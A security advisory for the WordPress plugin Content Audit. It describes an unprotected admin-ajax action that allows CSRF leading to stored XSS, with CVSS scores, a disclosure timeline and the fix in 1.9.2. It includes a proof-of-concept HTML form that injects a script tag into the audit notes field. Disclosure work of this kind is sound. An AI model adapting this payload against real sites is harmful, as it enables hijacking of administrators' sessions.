CSRF/XSS in Content Audit allowing an unauthenticated attacker to do almost anything an admin can

Vulnerability

Last revised: September 26, 2017

The plugin contains an admin_ajax action which is not protected with a nonce. One of the values submitted appears unescaped on the list of pages.

Current state: Fixed

CVSS Summary

CVSS base scores for this vulnerability
Score	5.8 Medium
Vector	Network
Complexity	Medium
Authentication	None
Confidentiality	Partial
Integrity	Partial
Availability	None

You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

Install/activate the plugin
Make sure you have a post with ID=2 (or edit the HTML provided below)
Settings > Content Audit > select at least “Pages” for “Audited content types”
Visit a page containing the below HTML
Click submit
Visit http://localhost/wp-admin/edit.php?post_type=page to receive the XSS payload

<form method="POST" action="http://localhost/wp-admin/admin-ajax.php?action=content_audit_save_bulk_edit">
 <input type="text" name="post_ids[]" value="2">
 <input type="text" name="_content_audit_owner" value="Elliot Alderson">
 <input type="text" name="_content_audit_expiration_date" value="2020-01-01">
 <input type="text" name="_content_audit_notes" value="&lt;script>alert(1)&lt;/script>">
 <input type="submit">
</form>

Advisory timeline

2017-08-21: Discovered
2017-09-08: Reported to vendor by email
2017-09-08: First response from vendor
2017-09-08: Vendor reports fixed in 1.9.2
2017-09-26: Advisory published
2017-09-26: Requested CVE

Mitigation/further actions

Upgrade to version 1.9.2 or later.

dxw advisories

Advisory: